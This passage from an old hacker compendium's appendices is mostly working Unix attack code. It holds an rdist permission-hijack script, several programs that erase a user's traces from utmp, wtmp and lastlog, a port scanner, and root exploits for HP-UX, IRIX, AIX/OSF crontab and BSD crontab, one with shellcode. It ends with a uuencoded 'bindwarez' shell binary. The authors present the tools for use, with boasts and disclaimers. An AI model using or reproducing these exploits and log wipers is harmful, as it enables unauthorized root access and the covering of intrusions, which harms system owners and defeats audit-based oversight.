      -----------------------------------------------------------------------------
      
      ..........................................................................
      .                                                                        .
      . 16. A shell script called gimme, used to read any system file          .
      ..........................................................................
      
      ----------------cut here
      #! /bin/sh
      # GIMME - "gimme' a file"
      # Demonstrate rdist's ability to give me permission to access anything.
      #
      # gimme  [ []]
      #        is the target file.
      #        is the octal mode to which the file access permission
      #               should be set.  Note that this may not be effective unless
      #               either the SUID (4000) or SGID (2000) bits are also requested.
      #        is the target directory for rdist to use if a hard
      #               link is desired.  Note that the user must have permission
      #               to create this directory, it must be on the same filesystem
      #               as the target file, and the target file must not be a
      #               directory.  This option is necessary to change the ownership
      #               of the target if chown() of a symbolic link modifies the
      #               link itself, and not the file it refers to.
      #
      
      dirname=gimme$$
      deftemp=/tmp
      defperm=6777
      
      if [ $1x = x ]; then
              echo "Usage: $0  [ []]" >&2
              exit 1
      fi
      
      if [ $2x != x ]; then
              perm=$2
      else
              perm=$defperm
      fi
      
      if [ $3x != x ]; then
              link="ln"
              temp=$3/$dirname
              target=$1
      else
              link="ln -s"
              temp=$deftemp/$dirname
              case $1 in
              /*)
                      target=$1
                      ;;
              *)
                      target=`pwd`/$1
                      ;;
              esac
      fi
      
      trap "rm -fr $temp; exit 1"  1 2 15
      umask 66
      mkdir $temp; if [ $? != 0 ]; then
              exit 1
      fi
      
      set `whoami` $LOGNAME
      user=$1
      set daemon `groups`
      while [ $# != 1 ]; do
              shift
      done
      group=$1
      
      (
              echo "t$temp/something"
              echo "R0 $perm 1 0 $user $group "
      
              while [ ! -f $temp/rdist* ]; do
                      sleep 1
              done
      
              set $temp/rdist*
              rm -f $1
              if $link $target $1 >&2; then
                      echo "" | dd bs=3 conv=sync 2>/dev/null
                      echo ""
      
                      echo 0 > $temp/status
              else
                      echo 1 > $temp/status
              fi
      
              exit
      ) | rdist -Server
      
      status=`cat $temp/status`
      rm -fr $temp
      exit $status
      -----------------------------cut here
      
      
      
      *********************************************
      * Appendix IV - Other UNIX system utilities *
      *********************************************
      
      
      ..........................................................................
      .                                                                        .
      . 1. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX  .
      ..........................................................................
      
      
      ------------------ cut here
      
      /* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
      /* This file totally wipes all presence of you on a UNIX system*/
      /* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
      /* is compatible..  This file is for information purposes ONLY!*/
      
      /*--> Begin source...    */
      #include 
      #include 
      #include 
      #include 
      #include 
      
      main(argc, argv)
          int     argc;
          char    *argv[];
      {
          char    *name;
          struct utmp u;
          struct lastlog l;
          int     fd;
          int     i = 0;
          int     done = 0;
          int     size;
      
          if (argc != 1) {
               if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
                   printf("You are now cloaked\n");
                   goto start;
                                                                 }
               else {
                    printf("close successful\n");
                    exit(0);
                    }
                         }
          else {
               printf("usage: close [file to close]\n");
               exit(1);
               }
      start:
          name = (char *)(ttyname(0)+5);
          size = sizeof(struct utmp);
      
          fd = open("/etc/utmp", O_RDWR);
          if (fd < 0)
              perror("/etc/utmp");
          else {
              while ((read(fd, &u, size) == size) && !done) {
                  if (!strcmp(u.ut_line, name)) {
                      done = 1;
                      memset(&u, 0, size);
                      lseek(fd, -1*size, SEEK_CUR);
                      write(fd, &u, size);
                      close(fd);
                  }
              }
          }
      
      
          size = sizeof(struct lastlog);
          fd = open("/var/adm/lastlog", O_RDWR);
          if (fd < 0)
              perror("/var/adm/lastlog");
          else {
              lseek(fd, size*getuid(), SEEK_SET);
              read(fd, &l, size);
              l.ll_time = 0;
              strncpy(l.ll_line, "ttyq2 ", 5);
              gethostname(l.ll_host, 16);
              lseek(fd, size*getuid(), SEEK_SET);
              close(fd);
          }
      }
      ---------------cut here
      
      .............................................................................
      .                                                                           .
      . 2. invisible.c  Makes you invisible, and works on some SunOS without root .
      .............................................................................
      
      
      ----------- cut here
      /* invisible.c - a quick hack courtesy of the rogue */
      /* erases your presence when root, or partially erases when on a sun and not root */
      /* peace, dudes */
      
      
      #include 
      #include 
      #include 
      #include 
      #include 
      
      main(argc, argv)
          int     argc;
          char    *argv[];
      {
          char    *name;
          struct utmp u;
          struct lastlog l;
          int     fd;
          int     i = 0;
          int     done = 0;
          int     size;
      
          name = (char *)(ttyname(0)+5);
          size = sizeof(struct utmp);
          
          fd = open("/etc/utmp", O_RDWR);
          if (fd < 0)
              perror("/etc/utmp");
          else {
              while ((read(fd, &u, size) == size) && !done) {
                  if (!strcmp(u.ut_line, name)) {
                      done = 1;
                      memset(&u, 0, size);
                      lseek(fd, -1*size, SEEK_CUR);
                      write(fd, &u, size);
                      close(fd);
                  }
              }
          }
          memset(&u, 0, size);
          fd = open("/var/adm/wtmp", O_RDWR | O_TRUNC);
          if (fd < 0)
              perror("/var/adm/wtmp");
          else {
              u.ut_time = 0;
              strcpy(u.ut_line, "~");
              strcpy(u.ut_name, "shutdown");
              write(fd, &u, size);
              strcpy(u.ut_name, "reboot");
              write(fd, &u, size);
              close(fd);
          }
      
      
          size = sizeof(struct lastlog);
          fd = open("/var/adm/lastlog", O_RDWR);
          if (fd < 0)
              perror("/var/adm/lastlog");
          else {
              lseek(fd, size*getuid(), SEEK_SET);
              read(fd, &l, size);
              l.ll_time = 0;
              strncpy(l.ll_line, "ttyq2 ", 5);
              gethostname(l.ll_host, 16);
              lseek(fd, size*getuid(), SEEK_SET);
              write(fd, &l, size);
              close(fd);
          }
          
      }
      ----------- cut here
      
      ..........................................................................
      .                                                                        .
      . 3. SySV Program that makes you invisible                               .
      ..........................................................................
      
      
      --------- cut here
      
      /* MME - MakeME, Version 1.00 for SySV / Source Compatible machines   
               MME will allow you to remove yerself from the UTMP file, change
               what name appears for you in UTMP, or change what TTY you appear
               to be on.
      
      If you modify this program or incorporate some of these routines into
      another program, please somewhere in the program tell where you got
      them from.. namely, put in some credits to me & This program , so
      you don't "playgerize".  It makes me mad when someone modifies someone
      else's work then pawns it off as their own original piece.  The credits
      can even be in a comment somewhere in the source instead of visual to
      the user. 
      
      syntax:
      mme
      mme login_name
      mme login_name new_tty
      
      in order to change tty name, you must first supply a login name
      then a ttyname.
      
      You MUST have write perm's to /etc/utmp to modify the main utmp file.
      */
      
      #include 
      #include 
      #include 
      #include 
      #include 
      
      char *mytty; /* For an exact match of ut_line */
      char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
      struct utmp *user;
      
      main(argc,argv)
      int argc;
      char *argv[];
      {
              int good= 0,cnt = 0,start = 1,cn = 0, cl = 0,index = 0;
              char err[80];
              if (argc >= 2) cn = 1;
              if (argc == 3) cl = 1;
              system(backup_utmp);
          printf("Welcome to MME 1.00 By Sir Hackalot\n");
          printf("Another PHAZESOFT Productions\n");
          printf("Status:");
          if (cn == 1) printf("Changing your login to %s\n",argv[1]);
              if (cl == 1) printf("Changing your tty   to %s\n",argv[2]);
              if (cl == 0 && cn == 0) printf("Removing you from utmp\n");
              utmpname("/etc/utmp");
      
      /* The Below Section finds OUR entry, even if more than 1 of the same name
         of us is logged on.  It finds YOUR tty, looks in utmp until it finds
         your tty, then "cnt" holds your index number */
              
              mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
              strcpy(mytty,++mytty); /* Make a string starting one pos greater */
              while (good != 1) {
                      user = getutent();
                      cnt++;
                      if (strcmp(user->ut_line,mytty) == 0) good =1;
              }
              utmpname("/etc/utmp"); /* Reset file pointer */
              for(start = 0;start < cnt;start++) {
                      user = getutent(); /* Move the file pointer to where we are */
              }
      
              /* Below: If we did not supply a command line arg to change name, etc,
                make us invisible from WHO.  WHO only displays USER_PROCESS 
                types, as does "w", "whodo" and all who variations.  You WILL
                be seen if they do who -l (or one some systems -L)
                if we did supply an argument make SURE we DO show up. */
      
              if (argc == 1)  user->ut_type = LOGIN_PROCESS; /* Become invisible */
              else user->ut_type = USER_PROCESS;
      
              /* ABove: You can change it to:
               else {
               user->ut_type = LOGIN_PROCESS;
               strcpy(user->ut_name,"LOGIN");
               }
                to totally hide your-self.  On some systems, if you do it, it will go
                thru the login process... But that is rare.  AT any-rate, for 
                safety, i left out the strcpy */
      
              /* Below: If we entered a new login name, change to that.
                If we entered a new tty, change to that. */
      
              if (argc == 2) strcpy(user->ut_name,argv[1]);
              if (argc == 3) strcpy(user->ut_line,argv[2]);
              pututline(user); /* Rewrite our new info */
              endutent(); /* Tell the utmp functions we are through */
              printf("Delete /tmp/utmp.bak if all is well. Else, copy it to /etc/utmp\n");
      }
      
      ----------- cut here
      
      .........................................................................
      .                                                                       .
      . 4. UNIX Port scanner                                                  .
      .........................................................................
      
      
      ----------- cut here
      
      /* 
       * internet port scanner 
       *
       * This program will scan a hosts TCP ports printing all ports that accept
       * connections, and if known, the service name.
       * This program can be trivially altered to do UDP ports also.
       *
       * Kopywrong (K) Aug. 25, '94 pluvius@io.org
       *
       * Hey kiddies, this is a C program, to run it do this:
       * $ cc -o pscan pscan.c
       * $ pscan  [max port]
       *
       * No, this will not get you root.
       * 
       * Changes:
       * Changed fprintf to printf in line 34 to work with my Linux 1.1.18 box
       * Netrunner 1/18/95 11:30pm
       * 
      */
      static char sccsid[] = "@(#)pscan.c     1.0     (KRAD) 08/25/94";
      #include 
      #include 
      #include 
      #include 
      #include 
      
      #define MAX_PORT 1024 /* scan up to this port */
      int s;
      struct sockaddr_in addr;
      char rmt_host[100];
      
      int skan(port)
      int port;
      {
       int r;
          s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
          if (s < 0) {
             /* fprintf("ERROR: socket() failed\n"); */
             /* Changed to printf for my Linux 1.1.18 box */
             printf("ERROR: socket() failed\n");
             exit(0);
          }
      
          addr.sin_family = PF_INET;
          addr.sin_port = port;
          addr.sin_addr.s_addr = inet_addr(rmt_host);
      
          r = connect(s,(struct sockaddr *) &addr, sizeof(addr));
      
          close(s);
      
          if (r < 0) {
             return (1 == 0);
          }
      
          return (1 == 1);
      }
      
      main(argc,argv) 
      int argc;
      char *argv[];
      {
       int a,b,c,d,e,f;
       struct hostent *foo;
       struct servent *bar;
      
         if (argc < 2) {
            fprintf(stderr,"usage: %s  [highest port]\n",argv[0]);
            exit(0);
         }
      
         if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
            foo = gethostbyname(argv[1]);
            if (foo == NULL) {
               fprintf(stderr,"error: cannot resolve host %s\n",argv[1]);
               exit(0);
            }
            sprintf(rmt_host,"%d.%d.%d.%d",(unsigned char )foo->h_addr_list[0][0],
                    (unsigned char ) foo->h_addr_list[0][1], 
                    (unsigned char ) foo->h_addr_list[0][2], 
                    (unsigned char ) foo->h_addr_list[0][3]);
         } else {
            strncpy(rmt_host,argv[1],99);
         }
      
      
         if (argc > 2) {
            f = atoi(argv[2]);
         } else
            f = MAX_PORT;
      
         fprintf(stdout,"Scanning host %s - TCP ports 1 through %d\n",rmt_host,f);
      
         for (e =1;e<=f;e++) {
          char serv[100];
            if (skan(e)) {
               bar = getservbyport(e,"tcp");
               printf("%d (%s) is running.\n",e,(bar == NULL) ? "UNKNOWN" :
                      bar->s_name);
            }
         }
      }
      
      ------------ cut here
      
      .........................................................................
      .                                                                       .
      .  5. Remove wtmp entries by tty number or username                     .
      .........................................................................
      
      
      ---------- cut here
      
      
      /* This program removes wtmp entries by name or tty number */
      
      #include 
      #include 
      #include 
      #include 
      
      void usage(name)
      char *name;
      {
          printf("Usage: %s [ user | tty ]\n", name);
          exit(1);
      }
      
      void main (argc, argv)
      int argc;
      char *argv[];
      {
          struct utmp utmp;
          int size, fd, lastone = 0;
          int match, tty = 0, x = 0;
      
          if (argc>3 || argc<2)
             usage(argv[0]);
      
          if (strlen(argv[1])<2) {
             printf("Error: Length of user\n");
             exit(1);
          }
      
          if (argc==3)
             if (argv[2][0] == 'l') lastone = 1;
      
          if (!strncmp(argv[1],"tty",3))
             tty++;
      
          if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) {
              printf("Error: Open on /usr/adm/wtmp\n");
              exit(1);
          }
      
          printf("[Searching for %s]:  ", argv[1]);
      
          if (fd >= 0)
          {
             size = read(fd, &utmp, sizeof(struct utmp));
             while ( size == sizeof(struct utmp) )
             {
                if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
                  ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) &&
                    lastone != 1)
                {
                   if (x==10)
                      printf("\b%d", x);
                   else
                   if (x>9 && x!=10)
                      printf("\b\b%d", x);
                   else
                      printf("\b%d", x);
                   lseek( fd, -sizeof(struct utmp), L_INCR );
                   bzero( &utmp, sizeof(struct utmp) );
                   write( fd, &utmp, sizeof(struct utmp) );
                   x++;
                }
                size = read( fd, &utmp, sizeof(struct utmp) );
             }
          }
          if (!x)
             printf("No entries found.");
          else
             printf(" entries removed.");
          printf("\n");
          close(fd);
      }
      
      ------------- cut here
      
      ............................................................................
      .                                                                          .
      .  6. SunOS wtmp editor                                                    .
      ............................................................................
      
      
      ---------- cut here
      
      /*
         /var/adm/wtmp editor for Sun's
         Written by gab, this will make a file wtmp.tmp then just copy
         it over /var/adm/wtmp and chmod 644 it
      */
       
      #include 
      #include 
      #include 
      main(argc,argv)
      int argc;
      char *argv[];
      {
      int fp=-1,fd=-1;
      struct utmp ut;
      int i=0;
      char name[8];
      if (argc!=2) { fprintf(stderr,"usage: %s accountname\n\r",argv[0]);  exit(2);}
      strcpy(name,argv[1]);
      if (fp=open("/var/adm/wtmp",O_RDONLY)) {
              fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
              while (read(fp,&ut,sizeof(struct utmp))==sizeof(struct utmp)) {
                      if (strncmp(ut.ut_name,name,strlen(name))) write(fd,&ut,sizeof(struct utmp));
                      i++;
              }
              close(fp);
              close(fd);
              }
      printf("Total: %d\n\r", i);
      }
      ------------ cut here
      
      .......................................................................
      .                                                                     .
      .  7. SunOS 4+ Zap your self from wtmp, utmp and lastlog              .
      .......................................................................
      
      
      -------------  cut here
      
      /*
            Title:  Zap.c (c) rokK Industries
         Sequence:  911204.B
       
          Syztems:  Kompiles on SunOS 4.+
             Note:  To mask yourself from lastlog and wtmp you need to be root,
                    utmp is go+w on default SunOS, but is sometimes removed.
          Kompile:  cc -O Zap.c -o Zap
              Run:  Zap 
       
      
             Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the
                    entered Username. It also Zeros out the last login data for
                    the specific user, fingering that user will show 'Never Logged
                    In'
       
            Usage:  If you cant find a usage for this, get a brain.
      */
       
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
       
      int f;
       
      void kill_tmp(name,who)
      char *name,
           *who;
      {
          struct utmp utmp_ent;
       
        if ((f=open(name,O_RDWR))>=0) {
           while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
             if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                       bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                       lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                       write (f, &utmp_ent, sizeof (utmp_ent));
                  }
           close(f);
        }
      }
       
      void kill_lastlog(who)
      char *who;
      {
          struct passwd *pwd;
          struct lastlog newll;
       
           if ((pwd=getpwnam(who))!=NULL) {
       
              if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
                  bzero((char *)&newll,sizeof( newll ));
                  write(f, (char *)&newll, sizeof( newll ));
                  close(f);
              }
       
          } else printf("%s: ?\n",who);
      }
       
      main(argc,argv)
      int  argc;
      char *argv[];
      {
          if (argc==2) {
              kill_tmp("/etc/utmp",argv[1]);
              kill_tmp("/usr/adm/wtmp",argv[1]);
              kill_lastlog(argv[1]);
              printf("Zap!\n");
          } else
          printf("Error.\n");
      }
      ------------ cut here
      
      
      ************************************
      * Appendix V - Other Unix Exploits *
      ************************************
      
      
      
      ..........................................................................
      .                                                                        .
      . 1. HP-UX Root vhe_u_mnt exploit                                        .
      ..........................................................................
      
      
      
      ------- cut here
      
      /***
       *
       * HP-UX /usr/etc/vhe/vhe_u_mnt bug exploit.
       *
       * This bug is exhibited in all versions of HP-UX that contain
       * /usr/etc/vhe/vhe_u_mnt setuid to root.
       *
       * This program written by pluvius@io.org
       * The exploit code itself written by misar@rbg.informatik.th-darmstadt.de
       *
       * I found that the exploit code didn't always work due to a race between
       * the child and the parent, and that a link() called failed due to
       * the fact that user directories and the /tmp are in different file systems
       * so you must create a symlink.
       * I added in a call to alarm() so that the timing between the two processes
       * is ok..
       *
       ***/
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      
      #define BUGGY_PROG "/usr/etc/vhe/vhe_u_mnt"
      #define NAME ""
      
      int test_host()
      { struct utsname name;
         uname(&name);
         return !strcmp(name.sysname,"HP-UX");
      }
      int check_mount()
      { struct stat my_buf;
         if (stat(BUGGY_PROG, &my_buf))
            return 0;
         return !((my_buf.st_mode & S_ISUID) != S_ISUID);
      }
      void pause_handler()
      {
         signal(SIGALRM,pause_handler);
      }
      int rhost_user(user)
      char *user;
      {
        struct passwd *info;
        char   homedir[80];
        int fd[2];
        int procno;
        struct stat my_buf;
        int fsize;
      
         info = getpwnam(user);
         if (info==NULL) {
            fprintf(stderr,"ERROR: Unknown user %s\n",user);
            exit(-3);
         }
         strcpy(homedir,info->pw_dir);
         if (homedir[strlen(homedir)-1] != '/')
            strcat(homedir,"/");
         strcat(homedir,".rhosts");
      
         signal(SIGALRM,pause_handler);
         memset(my_buf,0,sizeof(my_buf));
         stat(homedir,&my_buf);
         fsize = my_buf.st_size;
      
         /* now the exploit code... slightly modified.. but mostly from the source */
         /* by misar@rbg.informatik.th-darmstadt.de                                */
         pipe(fd);
         if (!(procno=fork())) {
            close(0);
            dup(fd[0]);
            close(fd[1]);
            close(1);
            close(2);
            alarm(2); /* wait for other process */
            nice(5);
            execl(BUGGY_PROG,NAME,NULL);
         } else {
          FILE *out;
          char listfile[25];
          char mntfile[25];
          struct stat dummy;
      
            close(1);
            dup(fd[1]);
            close(fd[0]);
            write(1,"+\n",2);
            sprintf(listfile,"/tmp/vhe_%d",procno+2);
            sprintf(mntfile,"/tmp/newmnt%d",procno+2);
            while (stat(listfile,&dummy));
            unlink(listfile);
            out=fopen(listfile,"w");
            fputs("+ +\n",out);
            fclose(out);
            unlink(mntfile);
            symlink(homedir,mntfile);
            waitpid(procno,NULL,0);
         }
         stat(homedir,&my_buf);
         return (fsize != my_buf.st_size);
      }
      
      void main(argc,argv)
      int   argc;
      char *argv[];
      {
        int i;
        int rhost_root = 0;
        char userid[10];
      
         if (!test_host()) {
            fprintf(stderr,"ERROR: This bug is only exhibited by HP-UX\n");
            exit(-1);
         }
      
         if (!check_mount()) {
            fprintf(stderr,
                    "ERROR: %s must exist and be setuid root to exploit this bug\n",
                    BUGGY_PROG);
            exit(-2);
         }
      
         for (i=0;(i<5)&&(!rhost_root);i++) {
            fprintf(stderr,"Attempting to .rhosts user root..");
            if (!rhost_user("root")) {
               fprintf(stderr,"failed.\n");
            } else {
               fprintf(stderr,"succeeded\n");
               rhost_root = 1;
            }
         }
      
         if (!rhost_root) {
            /* failed to rhost root, try user 'bin' */
            fprintf(stderr,"Too many failures.. trying user bin...");
            if (!rhost_user("bin")) {
               fprintf(stderr,"failed.\n");
               exit(-4);
            }
            fprintf(stderr,"succeeded.\n");
            strcpy(userid,"bin");
         } {
            strcpy(userid,"root");
         }
         fprintf(stderr,"now type: \"remsh localhost -l %s csh -i\" to login\n",
                 userid);
      }
      
      --------- cut here
      
      ..........................................................................
      .                                                                        .
      . 2. IRIX Root mail exploit                    .                         .
      ..........................................................................
      
      
      ---------- cut here
      
      #!/bin/sh
      MAIL="/bin/mail"
      RM="/bin/rm -f"
      CC="/usr/bin/cc"
      OS="IRIX"
      
      if  [ ".`uname -s`" != ".$OS" ];  then
        echo "this box is not running $OS !"
        exit 1
      fi
      echo "creating rewt.c"
      cat >rewt.c <<'EOF'
      main()
      {
      setuid(0);
      setgid(0);
      system("/bin/sh -i");
      }
      EOF
      echo "compiling..."
      $CC -o rewt rewt.c
      if [ -f rewt ]; then
        echo "done"
        $RM rewt.c
      else
        echo "unable to compile rewt.c"
        $RM rewt.c
        exit 1
      fi
      # make dummy mail file for -f
      echo "making dummy mail file"
      cat >dummymail <<'EOF'
      From mr.haqr@bogus.host.edu Sun Oct 30 00:00:00 1994
      Return-Path: 
      Message-Id: 
      From: mr.haqr (Mr. Haqr)
      Subject: Irix is secure!!@#%$^
      To: root (root)
      Date: Sun, 30 Oct 1994 00:00:00
      
      gimme sum rewt d00d!
      
      
      EOF
      echo "running $MAIL, type '!rewt' to get root, exit  with 'exit' and then 'q'"
      $MAIL -f dummymail
      echo "deleting evil files"
      $RM dummymail rewt rewt.c
      
      exit 0
      
      ----------- cut here
      
      .............................................................................
      .                                                                           .
      . 3. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX .
      .............................................................................
      
      
      [crongrab] [public release]
      
      Crontab has a bug.  You run crontab -e, then you goto a shell, relink the
      temp fire that crontab is having you edit, and presto, it is now your
      property.  This bug has been confirmed on various versions of OSF/1, Digital
      UNIX 3.x, and AIX 3.x
      
      If, while running my script, you somehow manage to mangle up your whole
      system, or perhaps do something stupid that will place you in jail, then
      neither I, nor sirsyko, nor the other fine folks of r00t are responsible.
      
      Personally, I hope my script eats your cat and causes swarms of locuses to
      decend down upon you, but I am not responsible if they do.
      
      --kmem.
      
      [-- Script kiddies cut here -- ]
      #!/bin/sh
       
      # This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996
      # This crappy exploit script was written by kmem.
      # and remember if ur not owned by r00t, ur not worth owning
      #
      # usage: crongrab  
       
      echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others???
      echo if this did not work on OSF/1 read the comments -- it is easy to fix.
       
      if [ $# -ne '2' ]; then
       echo "usage: $0  "
       exit
      fi
       
      HI_MUDGE=$1
      YUMMY=$2
      export HI_MUDGE
       
      UNAME=`uname`
      GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1"
       
      #SETUP the awk script
      cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1
       sed -f aix.sed .r00t-tmp1 > $YUMMY
      elif [ $UNAME =  "OSF1" ]; then
       #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines
       crontab -e 2>.r00t-tmp1
       awk -f 1.awk .r00t-tmp1 >$YUMMY
       # FOR PRE DIGITAL UNIX 3.X machines uncomment this line
       #crontab -l 2>&1 > $YUMMY
      else
       echo "Sorry, dont know your OS. But you are a bright boy, read the skript and"
       echo "Figger it out."
       exit
      fi
       
      echo "Checkit out  - $YUMMY"
      echo "sirsyko and kmem kickin it out."
      echo "r00t"
       
      #cleanup our mess
      crontab -r
      VISUAL=$oldvis
      EDITOR=$oldedit
      HI_MUDGE=''
      YUMMY=''
      export HI_MUDGE
      export YUMMY
      export VISUAL
      export EDITOR
      rm -f $GIRLIES
      
      ------------- cut here
      
      ............................................................................
      .                                                                          .
      .  4. IRIX mail exploit to make you any user on the mahine - BUT NOT root  .
      ............................................................................
      
      
      ----------- cut here
      
      [irixmksh] [public release]
      
      There are bugs in the IRIX mail proggies.  This sample script exploits them
      to give you an suid shell of any user on the system, EXCEPT, for uid=0.
      
      Obviously, this script should not be run if you are a clueless script kiddie
      and have no clue what is going to do.  If this script causes any sort of
      harm to you, physically or virtually, them members of r00t are not responsible,
      and in fact will probably laugh at you.
      
      r00t -- you may not like us, but your girlfriend does.
      
      Script kiddies cut here
      ---------------------------------------------------------------------------
      #!/sbin/ksh
      # usage: irixmksh  - creates an suid shell of any user on the system
      # except for uid=0
      
      FILES=qfAA12345 putq /tmp/x usr
      
      if [ "x`uname -s`" != "xIRIX" ];then
        echo "this box is not running IRIX - later..."
        exit 1
      fi
      
      if [ "$#" != "1" ]; then
        echo "Usage: $0 "
        exit 1
      fi
      
      TargetUser=$1
      
      # Make the mail queue files
      cat <<_r00t-text_>qfAA12345
      P0
      T830896940
      DdfAA12345
      Bblah
      Mdeferred: just cuz...
      C$TargetUser
      Sroot
      R<"|/tmp/x">
      H?P?return-path: 
      H?D?date: Tue, 30 Feb 1996 12:34:56 -0400
      H?F?from: root (root)
      Hreceived: by hackerz.dom (HackerOS/UCB 5.64/Hackerz Domain
              id AA12345 for root@hackerz.com; Tue, 30 Feb 1996 12:34:56 -0400
      H?M?message-id: <9602301234.AA12345@localhost>
      Happarently-to: root@plato.coolcode.com
      _r00t-text_
      
      
      # Make the script to run with euid=mail
      cat<<_r00t-text_>putq
      #!/bin/sh
      cp qfAA12345 /usr/spool/mqueue
      touch /usr/spool/mqueue/dfAA12345
      chown root /usr/spool/mqueue/*5
      _r00t-text_
      chmod u+x putq
      
      # Make the script to create the suid shell
      cat<<_r00t-text_>/tmp/x
      #!/bin/sh
      cp /bin/sh /tmp/b00sh.$TargetUser
      chmod 6777 /tmp/b00sh.$TargetUser
      _r00t-text_
      chmod u+x /tmp/x
      chown $TargetUser /tmp/x
      
      # Make the script to grab suid mail shell
      cat<<_r00t-text_>usr
      #!/bin/sh
      chgrp mail b00sh-mail
      chmod 2777 b00sh-mail
      _r00t-text_
      chmod u+x usr
      
      # Now snag mail access and send the queue files.
      cp /bin/sh b00sh-mail
      export PATH=.:$PATH
      export IFS=/
      echo "blah" | rmail $LOGNAME
      export IFS=
      
      b00sh-mail putq
      mailq
      
      # Clean Up:
      rm $FILES
      -------------------------------- cut here
      
      5. The Root BSD crontab exploit
      
      ---------------- cut here
      
      /*
      ** BSDI/FreeBSD exploit for crontab
      **
      ** For BSDi (Tested in 2.1) the default offset should be OK
      ** For FreeBSD, the offset seems to be around 1000
      **
      ** I didn't find this hole, I only exploited it.
      **
      ** Brian Mitchell brian@saturn.net
      */
       
      #include 
      #include 
      #include 
      #include 
      #include 
       
      #define DEFAULT_OFFSET          -1050
      #define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
      #define HAPPY_FILE              "./Window"
       
      long get_esp(void)
      {
         __asm__("movl %esp,%eax\n");
      }
       
      main(int argc, char **argv)
      {
         int fd;
         char *buff = NULL;
         unsigned long *addr_ptr = NULL;
         char *ptr = NULL;
         
         char execshell[] =
         "\xeb\x23"
         "\x5e"
         "\x8d\x1e"
         "\x89\x5e\x0b"
         "\x31\xd2"
         "\x89\x56\x07"
         "\x89\x56\x0f"
         "\x89\x56\x14"
         "\x88\x56\x19"
         "\x31\xc0"
         "\xb0\x3b"
         "\x8d\x4e\x0b"
         "\x89\xca"
         "\x52"
         "\x51"
         "\x53"
         "\x50"
         "\xeb\x18"
         "\xe8\xd8\xff\xff\xff"
         "/bin/sh"
         "\x01\x01\x01\x01"
         "\x02\x02\x02\x02"
         "\x03\x03\x03\x03"
         "\x9a\x04\x04\x04\x04\x07\x04";
         
       
        
      /*
       * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
       * a '=' character appears below
       */
       
         
         int i;
         int ofs = DEFAULT_OFFSET;
       
         /* if we have a argument, use it as offset, else use default */
         if(argc == 2)
            ofs = atoi(argv[1]);   
         else if (argc > 2) {
            fprintf(stderr, "egg [offset]\n");
            exit(-1);
         }
         /* print the offset in use */
         printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
         
         buff = malloc(4096);
         if(!buff)
         {
            printf("can't allocate memory\n");
            exit(0);
         }
         ptr = buff;
         /* fill start of buffer with nops */
         memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
         ptr += BUFFER_SIZE-strlen(execshell);
         /* stick asm code into the buffer */
         for(i=0;i < strlen(execshell);i++) 
            *(ptr++) = execshell[i];
         
         addr_ptr = (unsigned long *)ptr;
         for(i=0;i < (878/4);i++)
            *(addr_ptr++) = get_esp() + ofs;
         ptr = (char *)addr_ptr;
         *ptr++ = '=';
         *ptr++ = 'X';
         *ptr++ = '\n';
         *ptr = 0;
         printf("Writing to %s\n", HAPPY_FILE);
       
      /*
       * The sleep is required because as soon as crontab opens the tmp file it
       * stat's and saves it.  After the EDITOR program exists it stats again
       * and if they are equal then it assumes changes weren't made and exits.
       */
         fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
         write (fd, buff, strlen(buff));
       
         close(fd);
       
         execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
         /* Successful completion */
         exit(0);
      }
      ----------- cut here
      
      *********************************************
      * Appendix VI - UUENCODED FILES             *
      *********************************************
      
      1. Quantum's bindwarez utility uuencoded
      
      Bindwarez binary file for use with Quantum's PHF guide for login shells
      in the PHF section here.
      
      begin 664 binwarez.zip
      M4$L#!!0````(`'>"0B)K$\T.%CD``.QW```)`!``8FEN9'=AUQ41]+HF6$&!QP<5#1H4$/R[\ZO2I[NKNZNKJZNH^/>=L
      M-66EJU0J0?E3"R$"88]I=+,@>$YB\;,$HZ`5XH110I002CA`/=``[()[!"V`
      M!B`$X"0"I"&,A/N1/$W%@?X@#2'L/D%`P/Q")$N/!#SRDD:'T`$5[IHL4+V8
      MKH;`_%,`E5:'X`8<(937,;VB;/7TBM)I%665MHWQM57QB<+Z5(B_FU>[@(>W
      M`.0`+`;(`I@&,!,@%Z`0(!S@)H";`3#_(IYO*0`Z
      M@-LXS7*`N_A]&,!D?J_G80CG>RC`?&P;C[\3P``0`Y``,(_'+P-(![``3`+(
      M!I@-4``P7`C\H;^
      MF_)^[&_,5>)">7C#@/C1`+<"3!D0/Y6'<5S+YC^I(!C)=#>%R%L@O1ZGOXZE@?\;^0X\M4"^%2.OPUP
      M"O`X7O\'V![`Y_+TC[$]@-_$\<\`="`O&\?/`W2"O)F\A@L]$)[EN!%["]HA
